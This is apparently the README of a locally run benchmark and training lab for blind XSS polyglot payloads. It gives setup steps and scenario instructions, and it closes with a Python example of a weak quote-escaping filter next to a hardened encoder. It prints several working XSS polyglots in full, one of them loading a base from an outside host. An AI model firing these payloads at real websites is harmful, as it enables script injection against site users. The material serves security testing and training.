bXSS Benchmark is a web application designed to evaluate and benchmark the effectiveness of blind XSS (Cross-Site Scripting) polyglot payloads against a variety of real-world scenarios. It provides a structured environment for security researchers and developers to test, compare, and analyze payloads in different contexts, helping to improve web application security. It can also be used to train your XSS skills.
As the XSS gym training developed by brutelogic is no longer accessible, this project is a local alternative. I tried to integrate his previous scenarios as a reference, but this integration isn't fully finished.
It is a side project; do not hesitate to report issues. I will try to fix them as soon as possible!
PS: I would not recommend exposing this app publicly: no security measures have been deployed and the app is still under development.
- Scenario-Based Testing: Test payloads against a curated set of XSS scenarios.
- Payload Management: Add, edit, and manage XSS payloads.
- Automated and Headless Testing: Run tests automatically in headless mode.
- Result Tracking: View and analyze the effectiveness of payloads.
- Extensible: Easily add new scenarios via YAML files.
- Training: Practice your XSS skills in different contexts.
- Docker (optional, for containerized setup)
git clone https://github.com/your-org/xss-benchmark.git
cd xss-benchmark
docker compose up --build
echo '127.0.0.1 xsslab_app' | sudo tee -a /etc/hosts
The application will be available at http://xsslab_app:9090.
Go to the web app; on the home page, add your payload and run a benchmark.
Payload examples:
Brutelogic bxss
JavaScript://%250Aalert?.(1)// '/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--> </Title/</Style/</Script/</textArea/</iFrame/</noScript> \74k<K/contentEditable/autoFocus/OnFocus= /*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
Basic bxss
"><svg/onload=eval(atob('YWxlcnQoImJ4c3MiKQ=='))>//
You want to improve your payload and modify it manually?
- Go to the Scenarios page
- Click on the scenario you want to test.
- In the URL, add "?payload=" followed by your payload
- Press enter :)
- Edit the Scenario YAML File
  Add your new scenario to the main YAML file, e.g. app/scenarios/TBD/scenarios.yaml, following the existing format.
- Extract Scenario Files
  Use the provided script to split scenarios into individual YAML files:
  bash scripts/extract_scenarios.sh
  This will generate scenario files in app/scenarios/definitions/.
- Verify Scenario Loading
  The application loads scenarios from the definitions directory at startup or when you click on the button in the scenario web page.
- Test Your Scenario
  - Visit /scenarios in the web UI to see your new scenario.
  - Test with different payloads, using the 'payload=' url parameter
app/
  controllers/
  models/
  scenarios/
    definitions/ // scenario definitions are there
    TBD/
  templates/
  static/
  app.py
scripts/
  extract_scenarios.sh
tests/
README.md
requirements.txt
- Fork the repository and create a feature branch.
- Submit pull requests with clear descriptions.
- Follow PEP8 and project-specific code style.
For questions or support, please open an issue or contact the maintainer.
From Brutelogic - 105/110
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
Shortest alternative - 105/115
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
For js_snippet, insert the payload in a custom JS file. Because there is redundancy for brutelogic xss gym. The Brutelogic filter probably operates by backslashing quotes.
Add scenario: script src in head section
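The quote-backslashing filter guessed at in the note above, modelled as an added example (not code from this project or from Brutelogic): it shows why such a filter does not protect a value reflected inside an inline script block, next to an encoder that does. The function names, the page template and the probe value are assumptions made for the illustration.

```python
import json
from html.parser import HTMLParser

# Constructed probe value: harmless markup, carries no script of its own.
SAMPLE = "it's</script><b>probe</b>"


def backslash_quotes(value: str) -> str:
    """Assumed model of the weak filter: backslash-escape backslashes and quotes only."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def js_string_literal(value: str) -> str:
    """Hardened encoder: JSON string literal with <, > and & written as \\uXXXX,
    so the HTML parser never sees a tag inside the script block."""
    out = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        out = out.replace(ch, esc)
    return out


def render_weak(value: str) -> str:
    # Hypothetical scenario template: value reflected in a single-quoted JS string.
    return "<script>var q = '" + backslash_quotes(value) + "';</script>"


def render_hardened(value: str) -> str:
    return "<script>var q = " + js_string_literal(value) + ";</script>"


class TagCollector(HTMLParser):
    """Records every start tag the HTML parser sees in a rendered page."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(page: str) -> list:
    collector = TagCollector()
    collector.feed(page)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    print(tags_in(render_weak(SAMPLE)))      # extra <b>: the value left the script block
    print(tags_in(render_hardened(SAMPLE)))  # only the script tag
```

The HTML parser ends a script block at `</script>` before the JavaScript string is ever tokenized, which is why escaping quotes alone cannot contain the value.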
